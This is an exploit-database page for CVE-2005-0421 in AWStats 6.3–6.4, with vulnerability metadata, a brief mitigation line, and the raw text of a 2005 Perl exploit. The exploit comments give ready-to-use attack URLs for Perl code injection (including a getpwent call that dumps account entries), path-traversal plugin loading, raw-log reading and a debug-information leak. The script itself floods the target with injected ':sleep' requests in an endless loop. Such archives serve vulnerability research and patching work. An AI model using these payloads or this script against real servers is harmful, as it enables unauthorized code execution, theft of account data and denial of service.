header-logo
Suggest Exploit
vendor:
AWStats
by:
Unknown
7.5
CVSS
HIGH
Code Execution
78
CWE
Product Name: AWStats
Affected Version From: 6.3(Stable)
Affected Version To: 6.4(Development)
Patch Exists: NO
Related CWE: CVE-2005-0421
CPE: a:awstats:awstats:6.3
Metasploit:
Other Scripts:
Platforms Tested:
2005

Perl Code Execution in AWStats

The AWStats CGI script allows attackers to execute arbitrary Perl code by making a specially crafted HTTP request. This can lead to unauthorized access to sensitive information or the execution of malicious commands on the server.

Mitigation:

Update to a patched version of AWStats or apply any available security patches.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# 
# 
# Summarized the advisory www.ghc.ru GHC: /str0ke
#											
# [0] Exploitable example (raw log plugin):						
#    Attacker can read sensitive information						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog	
#											
# [1] Perl code execution. (This script)						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent		
#											
# [2] Arbitrary plugin including.							
# 											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#											
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).	
#    Every user can access debug function:						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1					
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2                                  
#											
# Be sure to change the $server + /cgi-bin location /str0ke				
#											

use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}

while () {
$rp = rand;
&ConnectServer;
}

# milw0rm.com [2005-02-14]

Navigation

Suggest Exploit

Services By CQR